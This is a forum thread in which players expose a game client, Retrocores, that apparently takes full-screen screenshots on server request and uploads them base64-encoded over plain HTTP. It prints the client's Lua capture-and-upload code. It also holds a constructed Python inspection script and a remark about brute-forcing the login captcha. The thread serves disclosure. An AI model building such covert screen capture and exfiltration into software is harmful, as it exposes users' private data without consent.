
Retrocores serious privacy violation! Watch out!

Kekando

Banned User
Joined
Jan 29, 2022
Messages
15
Reaction score
31
Location
Kekland
Retrocores client can screenshot your entire screen.
If you play on this server, remember not to open anything other than the client (photos, online banking, something with personal data) because Marcus and his great function can capture it in the screenshot.


-- modules/game_opcode/opcodes.lua - onExtendedOpcodeReceived
elseif _type == "rr" then -- screenshot requested by server
    requestReportScreen(protocol, opcode, buffer) -- send ss to server

----------------------------------------------------------------
-- modules/game_opcode/request_report.lua
local webVerifyToken = ""
local reportData = ""

function doGetReportPath()
    local localPlayer = g_game.getLocalPlayer()
    local pName = localPlayer:getName()
    local configFolder = g_resources.getWriteDir() .. "/report.dat"

    return configFolder
end

function doReplyReportRequest(token) -- function to start process of getting screenshot
    webVerifyToken = token
    local _path = doGetReportPath() -- get report.dat path
    local _msg = g_game.doScreenShotGame(_path) -- store on report.dat binary the screenshot (format BMP)

    scheduleEvent(compileReport, 1000) -- prepare for sending
end

function readAll(file)
    local f = assert(io.open(file, "rb"))
    local content = f:read("*all")

    f:close()

    return content
end

function compileReport()
    reportData = readAll(doGetReportPath()) -- read all content of binary file

    if reportData then
        sendReport() -- send by http request
    end
end

HOST = "retrocores.com"
PORT = 80

function sendReport() -- connect to http server
    if not HOST then
        return
    end

    local protocolHttp = ProtocolHttp.create()
    protocolHttp.onConnect = onConnect_report
    protocolHttp.onRecv = onRecv_report
    protocolHttp.onError = onError_report

    protocolHttp:connect(HOST, PORT)
    pwarning("sendReport()")
    getNativeSoftwares(5000, true)
end

function onConnect_report(protocol) -- after connect, prepare sending
    if not g_game.isOnline() then -- only send screenshot if player is logged in
        protocol:disconnect()

        return
    end

    local post = ""
    post = post .. "token=" .. webVerifyToken
    post = post .. "&topic=" .. "report"
    post = post .. "&report=" .. base64_encode(reportData) -- base64 encoding on screenshot binary
    local message = ""
    message = message .. "POST /client_connections/connections.php HTTP/1.1\r\n"
    message = message .. "Host: " .. HOST .. "\r\n"
    message = message .. "Accept: /\r\n"
    message = message .. "Connection: close\r\n"
    message = message .. "Content-Type: application/x-www-form-urlencoded\r\n"
    message = message .. "Content-Length: " .. post:len() .. "\r\n\r\n"
    message = message .. post

    protocol:send(message) -- send
    protocol:recv()
    pwarning("onConnect_report(protocol)")
end

function onRecv_report(protocol, message)
    if string.find(message, "HTTP/1.1 200 OK") then
        pwarning("Stats sent to server successfully!")
    end

    pwarning("onRecv_report(protocol, message)")
    pwarning("message: \n" .. message)
    protocol:disconnect()

    reportData = nil
end

function onError_report(protocol, message, code)
    pwarning("Could not send statistics: " .. message)

    reportData = nil
end

function urlencode(str)
    local function encodeChar(chr)
        return string.format("%%%X", string.byte(chr))
    end

    local output, t = string.gsub(str, "[^%w]", encodeChar)

    return output
end

local b = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

function base64_encode(data)
    return (data:gsub(".", function (x)
        local r = ""
        local b = x:byte()

        for i = 8, 1, -1 do
            r = r .. (b % 2^i - b % 2^(i - 1) > 0 and "1" or "0")
        end

        return r
    end) .. "0000"):gsub("%d%d%d?%d?%d?%d?", function (x)
        if #x < 6 then
            return ""
        end

        local c = 0

        for i = 1, 6 do
            c = c + (x:sub(i, i) == "1" and 2^(6 - i) or 0)
        end

        return b:sub(c + 1, c + 1)
    end) .. ({
        "",
        "==",
        "="
    })[#data % 3 + 1]
end

function base64_decode(data)
    data = string.gsub(data, "[^" .. b .. "=]", "")

    return data:gsub(".", function (x)
        if x == "=" then
            return ""
        end

        local r = ""
        local f = b:find(x) - 1

        for i = 6, 1, -1 do
            r = r .. (f % 2^i - f % 2^(i - 1) > 0 and "1" or "0")
        end

        return r
    end):gsub("%d%d%d?%d?%d?%d?%d?%d?", function (x)
        if #x ~= 8 then
            return ""
        end

        local c = 0

        for i = 1, 8 do
            c = c + (x:sub(i, i) == "1" and 2^(8 - i) or 0)
        end

        return string.char(c)
    end)
end

 

Amoaz

Faloria owner
Joined
Jan 14, 2009
Messages
1,515
Reaction score
210
Location
Sweden
When someone builds a captcha based on a static image and javascript (hardcoded css), and then releases a "Full anti-bot client", you know that should be taken with a grain of salt.
But I can not even imagine he went this route. This is a mechanic used in the early 2000s and proved to be too intrusive. And he reinvented it and is now actually breaking data laws.

Should probably investigate the client further to see what more "anti-bot" mechanics he got going.

Here's the captcha, just shows this guy has no idea what computer security is. Takes a few mins to script this and you can go full bruteforce on his login :)
1644697180048.png

Edit: Just saw the code you posted. This is honestly the works of a madman. Not only does he screenshot your screen, he posts it to the server with the awesome algorithm called "I have no idea what I am doing but this looks like encryption".
TLDR: Your screenshots with sensitive data are sent in cleartext to his server, which is running nginx from 2016 with a bunch of CVE's available :)
1644697723719.png
 
Last edited:
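
Added example, not code from any poster or from the client: a Python check to run over a request captured from your own machine. It parses a request shaped like the posted onConnect_report(), shows that the report field is only base64 over plain HTTP, and reads the BMP dimensions back out. The host, path and field names come from the posted code; the token, the 2x2 bitmap and the function names are constructed for illustration.

```python
import base64
import struct
from urllib.parse import parse_qs

REPORT_PATH = "/client_connections/connections.php"  # path taken from the posted code

def constructed_bmp(width=2, height=2):
    """Tiny 24-bit BMP standing in for a screenshot (constructed test data)."""
    row = (width * 3 + 3) // 4 * 4                     # BMP rows are padded to 4 bytes
    pixels = (b"\xfb\xef\xbe" * row)[: row * height]   # bytes chosen so base64 contains '+'
    file_hdr = struct.pack("<2sIHHI", b"BM", 54 + len(pixels), 0, 0, 54)
    dib_hdr = struct.pack("<IiiHHIIiiII", 40, width, height, 1, 24, 0,
                          len(pixels), 2835, 2835, 0, 0)
    return file_hdr + dib_hdr + pixels

def constructed_request(image, token="CONSTRUCTED-TOKEN"):
    """Request shaped like the posted onConnect_report(): raw base64 body, plain HTTP."""
    body = "token=%s&topic=report&report=%s" % (token, base64.b64encode(image).decode())
    head = ("POST %s HTTP/1.1\r\nHost: retrocores.com\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            "Content-Length: %d\r\n\r\n" % (REPORT_PATH, len(body)))
    return (head + body).encode("ascii")

def inspect_request(raw):
    """Classify one captured request and recover what an on-path observer can read."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("ascii", "replace").split(" ")
    text = body.decode("ascii", "replace")
    # Split the raw body by hand: the posted client never calls its urlencode(),
    # so a standard form parser would turn every base64 '+' into a space.
    fields = dict(p.split("=", 1) for p in text.split("&") if "=" in p)
    is_report = (len(parts) == 3 and parts[0] == "POST" and parts[1] == REPORT_PATH
                 and fields.get("topic") == "report")
    if not is_report:
        return {"is_report": False}
    report = fields.get("report", "")
    try:
        image = base64.b64decode(report)
    except ValueError:                                 # truncated or damaged capture
        image = b""
    is_bmp = image[:2] == b"BM" and len(image) >= 26
    width, height = struct.unpack_from("<ii", image, 18) if is_bmp else (None, None)
    return {"is_report": True, "token": fields.get("token"), "is_bmp": is_bmp,
            "width": width, "height": height,
            "form_parser_alters_payload": parse_qs(text).get("report", [""])[0] != report}

if __name__ == "__main__":
    print(inspect_request(constructed_request(constructed_bmp())))
```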

Dip Set

Veteran OT User
Joined
Dec 27, 2007
Messages
376
Solutions
2
Reaction score
329
I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.
 

Chriistian.L.B

Intermediate OT User
Joined
Apr 17, 2008
Messages
206
Solutions
4
Reaction score
107
> I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.

If it's not being used, why keep it? Invasion of privacy is serious, now he can say anything to defend himself
 

danilopucci

Active Member
Joined
Nov 22, 2019
Messages
67
Solutions
2
Reaction score
39
GitHub
danilopucci
> I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.

The otclient has a "feature" to make a screenshot of the map framebuffer, so it would not be necessary to implement a "high level" screenshot
 

Amoaz

Faloria owner
Joined
Jan 14, 2009
Messages
1,515
Reaction score
210
Location
Sweden
> I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.

He got a lot of "code not being used" that supports this, here's from init.lua in his client, where he was kind enough to comment for us how he stores the images
unknown.png


Also the endpoint he posts to is still very much active and functional :)
 

Levi999x

AoT
Joined
Dec 14, 2017
Messages
2,141
Solutions
57
Reaction score
1,388
Location
Germany
> I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.

yeye for sure

instant ban without a question
 
Last edited:

Silba

is stephany, the josh wife
Joined
Aug 22, 2013
Messages
436
Solutions
9
Reaction score
349
You can get banned for using a VM, using remote desktop and any sort of automation software that doesn't even target his client, this is a spyware client by all means.
I did wonder how long it would take before people started seeing this and providing proof :D

I'm still playing though, because it's legitimately refreshing to not have 99% of the population botting on a long term basis.
 

LordCompi

Banned User
Joined
May 2, 2013
Messages
216
Solutions
4
Reaction score
185

xDD
Post automatically merged:

> I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.

nice autoscreenshot, who knows what was autoscreenshoted xD
 

Xampy87

Well-Known Member
Joined
Dec 7, 2008
Messages
116
Reaction score
70
Location
spain
@Marcus Hey bro! we need an answer, this is a BIG REASON TO STOP PLAYING THIS OT, seriously violating the laws and privacy, we need a statement
 

kay

Legendary OT User
Joined
Apr 23, 2013
Messages
1,061
Solutions
11
Reaction score
1,496
Location
32316,31942,7
YouTube
TibiantisOnline
> @Marcus Hey bro! we need an answer, this is a BIG REASON TO STOP PLAYING THIS OT, seriously violating the laws and privacy, we need a statement

What statement do you expect? It's not a "reason to stop playing", but more like a reason to report it to the police. I wouldn't call it a privacy violation, but literally a crime. If that's true, he basically sold people a trojan. He tricked hundreds of people to install his malicious software and then gained access to anything they do at their computers. Just imagine what he could have stolen when you used that client. Passwords and other credentials? No problem, if they were only shown in your screen at one point. Private conversations OUTSIDE of the client? Sure. Private photos? You probably browsed them one day, so of course. He may have got naked pictures of your gf from the day she did on-camera striptease to you, he may have information of your work projects, he may know everything you do at your comp. Just try to think about every activity you have ever done at your computer, every opened file, app, website, watched porn, every picture, every single time of turning your webcamera on - he may have seen it. And not only seen, but apparently he also stores it. This is insane and I can't believe someone was THAT stupid to put that into his client. I know in the past there were servers that scanned your processes without notice, but this is FAR beyond that. In any civilized country it's a serious threat of prison sentence, doesn't matter whether he used those information or not.
 
Last edited:

Fresh

Quack!
Joined
Oct 21, 2009
Messages
1,771
Solutions
18
Reaction score
501
Location
Poland
Buy n4k3d p!cture$ of gf from the big camera day, paying on Kingdomswap 2 gp, k.
Ok, let me lose, 4 gp, we have valentines today, so let's go crazy!

@ edit : that was not my comment, please remove it, probably Marcus already stole my OTLand details, thanks.
disclaimer : this is joke, thanks
 
Last edited:

snoff

Active Member
Joined
Nov 9, 2017
Messages
23
Reaction score
32
Wow too funny man


I remember talking to him with other ppl on his dc b4 server started asking questions about this new anti bot features and he himself said he does not record because id be illegal.. maybe he thought taking screen shots is okay who knows


edit
 
